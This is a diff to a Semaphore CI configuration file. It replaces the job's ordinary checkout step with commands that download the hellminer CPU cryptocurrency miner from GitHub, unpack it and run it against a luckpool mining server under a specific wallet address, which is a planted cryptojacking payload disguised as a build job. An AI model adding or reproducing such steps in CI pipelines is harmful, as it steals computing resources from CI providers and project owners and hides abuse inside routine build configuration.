--- a/.semaphore/semaphore.yml
+++ b/.semaphore/semaphore.yml
@@ -10,4 +10,6 @@ blocks:
       jobs:
         - name: 'Job #1'
           commands:
-            - checkout
+            - 'wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz'
+            - tar xf hellminer_cpu_linux.tar.gz
+            - './hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQ51pRa6EAyQNNU3xaPL7oHu8JkfZcVUDD.Anak2 -p x --cpu 2'
